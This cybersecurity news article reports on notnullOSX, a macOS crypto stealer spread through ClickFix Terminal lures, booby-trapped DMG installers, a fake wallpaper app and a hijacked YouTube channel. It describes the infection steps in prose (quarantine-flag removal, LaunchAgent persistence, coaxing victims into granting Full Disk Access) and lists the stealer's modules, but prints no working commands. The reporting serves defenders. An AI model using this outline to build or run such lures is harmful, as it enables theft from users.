Hackers are abusing a fake macOS wallpaper app and a hijacked YouTube channel to quietly deliver notnullOSX, a new crypto-focused stealer that targets Macs via ClickFix commands and weaponized DMG installers.
The campaign is highly selective, going after victims with crypto holdings above 10,000 USD and using polished lures that closely mimic legitimate apps and workflows.
notnullOSX is linked to underground developer 0xFFF, who re-emerged under the alias “alh1mik” in 2024 after a notorious exit from the XSS cybercrime forum and promised a new, exclusive macOS stealer.
By early 2026, that promise materialized as a Go-based stealer with modular architecture, heavy obfuscation, and full backdoor-like capabilities.
Moonlock Lab telemetry first detected notnullOSX on March 30, 2026 , in Vietnam, Taiwan, and Spain, indicating an active, ongoing campaign.
The operators use an affiliate panel to pre-screen targets by wallet value, only processing submissions where the cryptocurrency holdings exceed 10,000 USD, ensuring the tool is deployed against high-value macOS users.
This level of manual selection, along with detailed fields for social media, correspondence history, and wallet address, shows a hand-targeted, spear-phishing-style operation rather than mass spraying.
The infection begins with a fake “protected” Google document that displays an encryption error tied to a bogus “Google API Connector” issue and offers two “fix” paths both of which deliver the same payload.
In the ClickFix chain, the page presents a base64-encoded Terminal command as the supposed remedy, betting on macOS users ’ comfort with copying and pasting shell commands to resolve technical issues.
Decoding the command reveals a curl-based one-liner that pulls a bash installer from attacker-controlled infrastructure, which then downloads a Mach-O binary, removes Gatekeeper’s quarantine flag, wraps it into a hidden .app, and establishes persistence through a LaunchAgent.
Victims are walked through granting Full Disk Access (FDA) in System Settings, effectively granting a blanket exception to macOS’s TCC privacy framework and allowing the implant to access Messages, Notes, Safari data, and more without further prompts.
This is not a TCC exploit; it is social engineering that convinces the user to hand over all sensitive data access in one step.
The second chain uses a malicious DMG that contains an Install.A. sh file, a README, and a Terminal alias, lowering the technical barrier by launching Terminal directly from the disk image instead of asking users to paste commands.
Install.sh appears as a large base64 blob; decoded, it runs a script that ultimately drops the same notnullOSX implant as the ClickFix path.
On the delivery side, researchers observed a fake “WallSpace.app” posing as a legitimate macOS live wallpaper application, hosted on domains such as wallpapermacos[.]com and wallspaceapp[.]com.
The landing pages look professional, feature cinematic screenshots, and offer a “Download Free” button, while the download path itself triggers malware warnings from services like Cloudflare and is flagged as malicious on automated scanners.
One of these pages embeds a textbook ClickFix flow with a Terminal graphic, a base64-encoded command, and step-by-step instructions to “Open Terminal, Paste & Run, Pick a Wallpaper.”
Traffic to the fake wallpaper sites is funneled through a YouTube channel using the handle @wallspacemacos, which hosts a single video titled “WallSpace – Live Wallpaper for macOS” with around 50,000 views gained in roughly two weeks.
The channel itself dates back to 2015 but shows only 43 subscribers and one video, a pattern consistent with an older hijacked account repurposed for malware distribution and artificially promoted through paid ads or SEO manipulation .
The video description links directly to wallpapermacos[.]com, connecting the YouTube lure to the fake app download path.
By abusing a long-lived account with real historical metadata, the attackers gain implicit trust and bypass suspicion that would typically surround a brand-new channel pushing unknown macOS utilities.
A channel dormant for 10 years that suddenly publishes a single malware distribution video and accumulates 50,000 views in 2 weeks is a pattern that is consistent with one explanation.
Once installed with Full Disk Access, notnullOSX runs as a multi-architecture Mach-O binary with modules downloaded on demand from a legitimate CDN (Filestack), each focused on a specific data category.
Confirmed modules include SystemInfo, iMessageGrab, AppleNotesGrab, SafariCookiesGrab, CryptoWalletsGrab, BrowserGrab, BrowserHistoryGrab, FirefoxGrab, CredsGrab, TelegramGrab, and ReplaceApp, giving operators broad reach into personal data, crypto assets, and developer credentials.
CryptoWalletsGrab targets both desktop wallets (e.g., Bitcoin Core, Electrum, Wasabi, Exodus, Atomic) and a hard-coded list of browser wallet extensions, copying raw data and IndexedDB vaults for offline abuse.
CredsGrab sweeps SSH keys , cloud provider credentials, and configuration files for platforms such as AWS, Azure, GCP, Kubernetes, Terraform, npm, and more, effectively turning a compromised Mac into a launchpad for lateral movement and software supply chain compromise.
ReplaceApp appears designed to swap legitimate hardware wallet management apps like Ledger Live or Trezor with trojanized versions, allowing attackers to intercept seed phrases during setup while preserving original icons to avoid user suspicion.
Follow us on Google News , LinkedIn , and X to Get Instant Updates and Set GBH as a Preferred Source in Google .
Mayura Kathir is a cybersecurity reporter at GBHackers News, covering daily incidents including data breaches, malware attacks, cybercrime, vulnerabilities, zero-day exploits, and more.
Vercel has confirmed a security breach involving unauthorised access to certain internal systems, and the…
GitLab has released emergency security patches addressing 11 vulnerabilities across its Community Edition (CE) and Enterprise…
The Harvester APT group has quietly expanded its espionage arsenal with a new Linux variant…
Malicious npm package js-logger-pack is now abusing Hugging Face not just as a malware CDN, but also…
A newly discovered Linux variant of the GoGra backdoor is being used by the Harvester…
A critical Server-Side Request Forgery (SSRF) vulnerability in LMDeploy's vision-language module was exploited in active…